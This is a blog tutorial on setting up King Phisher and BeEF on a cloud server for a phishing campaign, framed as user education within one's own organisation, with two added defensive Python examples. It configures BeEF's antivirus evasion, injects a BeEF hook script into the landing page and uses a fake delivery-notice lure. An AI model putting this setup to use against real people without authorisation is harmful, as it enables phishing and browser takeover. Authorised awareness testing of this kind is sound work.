Gone KingPhishin’ Part 1 – KingPhisher + BeEF + Digital Ocean + Kali

!!UPDATED INSTRUCTIONS FOR RELEASE 1.5.1 here !!

Running a phishing campaign against your organisation is a good way to educate users against the perils of the inbox. Some of the common problems with education-based phishing runs of any reasonable size include:

  • The pain of spinning up infrastructure for the campaign
  • Tracking user participation and response
  • The reconfiguration efforts required each time a new set of individuals is targeted

king-phisher takes care of a lot of those problems. Here’s my quick and dirty setup that utilises a $10-per-month VPS service to run the campaign.

Scenario
As mentioned earlier, I’ll be deploying this to a $10/month cloud server on Digital Ocean, as a 24/7 service is needed for a proper phishing campaign and Digital Ocean offers a solid product at the right price. A VPS isn’t required; you can of course host it yourself.

To increase the chances of a successful campaign, we’ll be running the king-phisher web server on TCP port 80, and BeEF on TCP port 443 as both HTTP and HTTPS are pretty much guaranteed to be permitted on the outbound route of a normal business network.

Prerequisites

  • A box running Ubuntu 14.10 x64  (this probably works on Debian and a range of other distros, but no guarantees)
  • A standard user configured (via adduser)
  • Remotely accessible SSH server running

Configuring the king-phisher server
So I’ve got my cloud Ubuntu 14.10 x64 virtual machine ready to go, freshly updated/upgraded using the apt package manager. Next step is to install postgresql (we won’t be using sqlite as support is being wound back for king-phisher) along with some other dependencies, and then run the automated installer script. Use sudo or the root account as you see fit:

root@deceptor:~# apt-get install postgresql  python-mpltoolkits.basemap python-mpltoolkits.basemap-data 
Reading package lists… Done
Building dependency tree
Reading state information… Done
The following extra packages will be installed:
postgresql-9.4 postgresql-client-9.4 postgresql-client-common postgresql-common ssl-cert


* Starting PostgreSQL 9.4 database server                                                                                     [OK ] 
Setting up postgresql (9.4+162) …
root@deceptor:~# 
root@deceptor:~# cd /opt && wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && sudo bash ./install.sh
Linux version detected as Ubuntu
Downloading and installing the King Phisher server to /opt/king-phisher
Successfully cloned the git repo
Installing Ubuntu dependencies


root@deceptor:/opt#

This will pull the latest version of king-phisher from SecureState’s GitHub repository, download all the dependencies and install king-phisher in the /opt directory. Go grab some coffee, as there are a number of packages for the installer to pull and configure. It took around 10 minutes.

If you happen to get any pip errors (particularly ImportError: cannot import name IncompleteRead), then you may need to re-install pip via easy_install:

root@deceptor:~# apt-get remove python-pip


root@deceptor:~# easy_install pip
Searching for pip
Reading https://pypi.python.org/simple/pip/


Finished processing dependencies for pip

root@deceptor:~#

…then rerun install.sh to finish installing the server.

Once it’s complete, you’ll need to configure Postgresql to support your king-phisher instance. Use your favourite editor to add the following line to /etc/postgresql/9.4/main/pg_hba.conf:

host    "king_phisher"  "king_phisher"  127.0.0.1/32            md5

..then configure the Postgresql user account for king_phisher:

root@deceptor:~# su postgres
postgres@deceptor:~# createuser king_phisher -P
Enter password for new role: 
:<yourpassword>
Enter it again: 
:<yourpassword>

postgres@deceptor:~# createdb --owner=king_phisher king_phisher
postgres@deceptor:~# exit
root@deceptor:~# 

If during the creation you are asked any questions about the role of the king_phisher user, just answer “n” to all of them. Once this is done, you’ll need to update the king-phisher server configuration to use your newly-created Postgresql database by editing /opt/king-phisher/server_config.yml. Comment out the following line:

database: sqlite:////var/king-phisher/king-phisher.db

..then add the following:

database: postgresql://king_phisher:<yourpassword>@localhost/king_phisher

Make sure your indenting is accurate, then restart the Postgresql server. Test to make sure KingPhisherServer starts correctly:

root@deceptor:~# /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml 
INFO     listening on 0.0.0.0:80
INFO     0.0.0.0:80 – basic authentication has been enabled
INFO     0.0.0.0:80 – serving files has been enabled
INFO     initializing database connection with driver postgresql
INFO     the job manager has been started
WARNING  the specified geoip database does not exist, downloading a new copy
INFO     Starting new HTTP connection (1): geolite.maxmind.com
INFO     server running in process: 22826 main tid: 0x7ffbb4525740
INFO     dropped privileges to the nobody account

Ok, the king-phisher server is now sorted. Ctrl+C to kill it for now, as it’s time to install BeEF into the /opt directory and configure its dependencies:

root@deceptor:/opt# git clone https://github.com/beefproject/beef.git
Cloning into ‘beef’…
remote: Counting objects: 24769, done.
remote: Total 24769 (delta 0), reused 0 (delta 0), pack-reused 24769
Receiving objects: 100% (24769/24769), 9.69 MiB | 3.73 MiB/s, done.
Resolving deltas: 100% (12811/12811), done.
Checking connectivity… done.
root@deceptor:/opt/beef# apt-get install ruby-all-dev libsqlite3-dev sqlite3 

root@deceptor:/opt# gem install rvm

root@deceptor:/opt# gem install bundler

root@deceptor:/opt# cd beef 

root@deceptor:/opt/beef# ./beef
Could not find gem ‘eventmachine (>= 0) ruby’ in any of the gem sources listed in your Gemfile or available on this machine.
Run `bundle install` to install missing gems.
root@deceptor:/opt/beef# bundle install

root@deceptor:/opt/beef# 

Edit /opt/beef/config.yaml  and change the server port to 443:

# HTTP server
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "443"

…then enable antivirus evasion:

 evasion:
            enable: true

You should also DEFINITELY change the admin password for BeEF – this is also configurable in  /opt/beef/config.yaml. You should now be able to run BeEF:

root@deceptor:/opt/beef# ./beef 
[ 6:45:33][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[ 6:45:34][*] Browser Exploitation Framework (BeEF) 0.4.6.0-alpha
[ 6:45:34]    |   Twit: @beefproject
[ 6:45:34]    |   Site: http://beefproject.com
[ 6:45:34]    |   Blog: http://blog.beefproject.com
[ 6:45:34]    |_  Wiki: https://github.com/beefproject/beef/wiki
[ 6:45:34][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[ 6:45:34][*] BeEF is loading. Wait a few seconds…
[ 6:45:39][*] 13 extensions enabled.
[ 6:45:39][*] 240 modules enabled.
[ 6:45:39][*] 3 network interfaces were detected.
[ 6:45:39][+] running on network interface: 127.0.0.1
[ 6:45:39]    |   Hook URL: http://127.0.0.1:443/hook.js
[ 6:45:39]    |_  UI URL:   http://127.0.0.1:443/ui/panel
[ 6:45:39][+] running on network interface: 1.2.3.4
[ 6:45:39]    |   Hook URL: http://1.2.3.4:443/hook.js
[ 6:45:39]    |_  UI URL:   http://1.2.3.4:443/ui/panel
[ 6:45:39][+] running on network interface: 2.3.4.5
[ 6:45:39]    |   Hook URL: http://12.3.4.5:443/hook.js
[ 6:45:39]    |_  UI URL:   http://2.3.4.5:443/ui/panel
[ 6:45:39][*] RESTful API key: 3cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx8e
[ 6:45:39][*] DNS Server: 127.0.0.1:5300 (udp)
[ 6:45:39]    |   Upstream Server: 8.8.8.8:53 (udp)
[ 6:45:39]    |_  Upstream Server: 8.8.8.8:53 (tcp)
[ 6:45:39][*] HTTP Proxy: http://127.0.0.1:6789
[ 6:45:39][*] BeEF server started (press control+c to stop)

Righto, now we need to configure our mail transport agent. I won’t be using the king-phisher version, not because it’s not great, but just because 🙂 so I’ll configure postfix instead. Swap out myname@mydomain for an appropriate value:

root@deceptor:/opt/beef# apt-get install mailutils postfix

Select Internet Site and pick an appropriate FQDN value. Then sort out the rest of the config:

root@deceptor:/opt/beef# echo "root myname@mydomain.com" > /etc/postfix/generic
root@deceptor:/opt/beef# postmap /etc/postfix/generic

Add an smtp_generic_maps entry and change the inet_interfaces value to 127.0.0.1 in /etc/postfix/main.cf:

inet_interfaces = 127.0.0.1
smtp_generic_maps = hash:/etc/postfix/generic

Restart postfix. Done.

Configuring the KingPhisher client
Configuring the client is pretty straightforward – see the king-phisher install page for a list of known supported platforms/OS. I’ll be using Kali 1.0.8 to run the client. The easiest way to get the client is to carbon copy what we did for the server, and install the extra packages that allow us to use the mapping functionality:

root@kali:~# apt-get install libgeos++-dev libgeos-3.3.3 libgeos-dev python-mpltoolkits.basemap python-mpltoolkits.basemap-data
Reading package lists… Done
Building dependency tree       
Reading state information… Done


root@kali:~# 

root@kali:~# wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && sudo bash ./install.sh
Linux version detected as Kali
Downloading and installing the King Phisher server to /opt/king-phisher


Start the King Phisher server with the following command:
sudo /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml

root@kali:~# 

Now you should be able to run the gui client by navigating to /opt/king-phisher and running ./KingPhisher:

 

Back on your Digital Ocean box, start both the KingPhisher server and BeEF server, then fill in the connection details on your client and click Connect. Create a new campaign by giving it a name and click Select. You’ll now need to start filling in the fields for your campaign. Make sure you fill in all the fields – particularly the source email values. The campaign won’t run without them.

Let’s use the “fake delivery notification” template by setting the Message HTML file to /opt/king-phisher/data/client/king_phisher/email_templates/purchases.html. This will utilise the fake delivery notification email template which will be sent to our victims.

The document root for KingPhisher’s webserver is specified in the last line of /opt/king-phisher/server_config.yml – the default location is /var/www so we’ll put all our web content there. For this campaign, let’s just symlink the web content for the education package provided by SecureState. Jump back onto your Digital Ocean box and run the following:

root@deceptor:~# ln -s /opt/king-phisher/data/server/king_phisher/education/* /var/www

We will also use one of the SecureState email templates in the next step. Back on your Kali box (or whatever system you’re using to run the KingPhisher client) create a CSV file containing one firstname,lastname,emailaddress per line for each target in VIM/Nano/YourFavourite editor.
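
Since this is an education run against your own organisation, it is worth checking the target file before it is loaded into the client. The following is an added example, not part of the original post or of king-phisher: it validates the firstname,lastname,emailaddress layout and rejects malformed, duplicate or out-of-scope addresses. The AUTHORISED_DOMAINS value and the sample rows are constructed placeholders.

```python
import csv
import io
import re

# Assumption: the domains this engagement is authorised to mail (placeholder).
AUTHORISED_DOMAINS = {"example.com"}
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)$")

# Constructed sample in the firstname,lastname,emailaddress layout.
SAMPLE_CSV = """\
Alice,Ng,alice.ng@example.com
Bob,Ortiz,bob.ortiz@example.com
Carol,Diaz,carol@partner.example.net
Dan,Lee,dan.lee[at]example.com
alice,ng,Alice.Ng@EXAMPLE.com
Eve,eve@example.com
"""

def check_targets(csv_text, allowed=AUTHORISED_DOMAINS):
    """Return (accepted rows, rejected (line number, reason) pairs)."""
    accepted, rejected, seen = [], [], set()
    for lineno, row in enumerate(csv.reader(io.StringIO(csv_text)), start=1):
        row = [cell.strip() for cell in row]
        if not any(row):
            continue  # ignore blank lines
        if len(row) != 3 or not all(row):
            rejected.append((lineno, "expected firstname,lastname,emailaddress"))
            continue
        first, last, email = row
        match = EMAIL_RE.match(email)
        if not match:
            rejected.append((lineno, "malformed address"))
            continue
        address = email.lower()
        # Exact domain match only: subdomains must be listed explicitly.
        if match.group(1).lower() not in allowed:
            rejected.append((lineno, "domain outside authorised scope"))
        elif address in seen:
            rejected.append((lineno, "duplicate address"))
        else:
            seen.add(address)
            accepted.append((first, last, address))
    return accepted, rejected

if __name__ == "__main__":
    ok, bad = check_targets(SAMPLE_CSV)
    print(len(ok), "accepted;", "rejected:", bad)
```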

Now we should have everything we need to run the campaign:

The following fields are the most critical:

Web Server Url: This will be the address of your Digital Ocean box, mapped through to /var/www (I’ve obviously added a DNS record for mine here).
Source Email: The fake originating email address.
Message HTML File: Template for the campaign, located on your local system.
Target CSV File: The file containing your targets.

In the Edit tab, you can see how each element is pulled from the KingPhisher configuration and your template file to populate each mail. Once you’re happy with everything, click the Preview tab to see what your phishing email will look like.

SMTP Configuration settings
We need to tell the client how to talk to our postfix mail server. In the client, select Edit>Preferences and click the SMTP Server tab. Ensure the following are set:

– SMTP Server is set to localhost:25
– Tunnel Over SSH is on
– SSH Server Name is your Digital Ocean IP address
– SSH Username is your standard username on your Digital Ocean box

Click Apply when finished. It can take a little while for the GUI to become responsive again, so be patient.

Integrating BeEF hooks
Before we send this one off, we should configure the BeEF hook to give us more exploitation options. Once again, under Edit>Preferences of the client you’ll find the BeEF Settings section under the Server tab. Take a look at your running version of BeEF on your Digital Ocean box (or the BeEF config itself) to find the hook URL and include that (something like http://1.2.3.4:443/hook.js). Remember – if you’ve followed this tutorial step by step, the hook should be running on TCP port 443.

You’ll need to make sure your victim(s) run the BeEF hook when they hit the landing page. Edit /var/www/index.html and add the following after the <head> tag:

<script src="/kp.js"></script>

Great, now they will be BeEF-hooked when they visit.
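
Seen from the monitoring side, this setup leaves a recognisable trace: BeEF answers plain HTTP on TCP port 443, so a forward proxy records ordinary GET requests to port 443 rather than CONNECT tunnels. The following added example (not part of the original post) flags such requests in proxy logs; the five-field log layout and the sample lines are constructed for illustration.

```python
from urllib.parse import urlsplit

# Constructed sample lines in an assumed forward-proxy layout:
# <timestamp> <client-ip> <method> <target> <status>
SAMPLE_LOG = """\
2015-03-02T09:14:07Z 10.0.4.21 CONNECT mail.example.com:443 200
2015-03-02T09:14:09Z 10.0.4.37 GET http://203.0.113.10/index.html 200
2015-03-02T09:14:10Z 10.0.4.37 GET http://203.0.113.10:443/hook.js 200
2015-03-02T09:14:12Z 10.0.4.52 GET http://203.0.113.10:443/favicon.ico 404
2015-03-02T09:15:02Z 10.0.4.52 GET http://intranet.example.com/hook.json 200
truncated line
"""

def find_cleartext_443(log_text):
    """Return one finding per plain-HTTP request sent to TCP port 443."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # malformed or truncated entry
        timestamp, client, method, target, _status = fields
        if method == "CONNECT":
            continue  # TLS tunnel: the normal way port 443 appears in a proxy log
        try:
            url = urlsplit(target)
            port = url.port
        except ValueError:
            continue  # unparsable URL or port
        if url.scheme != "http" or port != 443:
            continue
        reasons = ["cleartext HTTP on tcp/443"]
        if url.path.rsplit("/", 1)[-1] == "hook.js":
            reasons.append("script named hook.js")
        findings.append({"time": timestamp, "client": client,
                         "host": url.hostname, "reasons": reasons})
    return findings

def clients_by_host(findings):
    """Group affected client addresses under each destination host."""
    grouped = {}
    for finding in findings:
        grouped.setdefault(finding["host"], set()).add(finding["client"])
    return grouped

if __name__ == "__main__":
    for finding in find_cleartext_443(SAMPLE_LOG):
        print(finding)
```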

Initiate the campaign
Right, you should now be ready to go! In the Configuration tab, click Verify URL to make sure your KingPhisher server is running and that the landing page for your victims is active and reachable. Go to the Send tab and click Start to kick off your campaign. You’ll be asked to authenticate your client to your Digital Ocean box once more, then off go your nasty emails! Now you can sit back and watch the magic via the View Campaign tab or play with your victims via BeEF’s control panel.

I won’t walk you through campaign management and all the cool features that KingPhisher has, including global mapping, activity tracking, etc, suffice to say that it’s a great platform to run your campaigns from and is very easy to use once you’re set up.

Next time
I’ll follow up this post shortly to cover off some more functionality that you will find useful for your phishing campaigns, including:

– Enabling SSL/TLS
– Capturing credentials

Hope this helps! Comments/feedback welcome.

sw1tch

5 Comments

  1. I followed the instructions with no problems until I went to see if KingPhisherServer started correctly by running /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml The server didn’t start and my output is as follows:

    root@KingPhish:~# /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml
    Traceback (most recent call last):
    File “/opt/king-phisher/KingPhisherServer”, line 42, in
    from king_phisher import color
    File “/opt/king-phisher/king_phisher/__init__.py”, line 33, in
    from . import version
    File “/opt/king-phisher/king_phisher/version.py”, line 37, in
    import smoke_zephyr.utilities
    ImportError: No module named smoke_zephyr.utilities
    root@KingPhish:~#

    Any idea what went wrong?

    1. Looks like you’re missing some packages. Pip normally takes care of the dependencies, so I’d recommend running ‘pip install -r requirements.txt’ from the king-phisher directory to see if that resolves the issue.
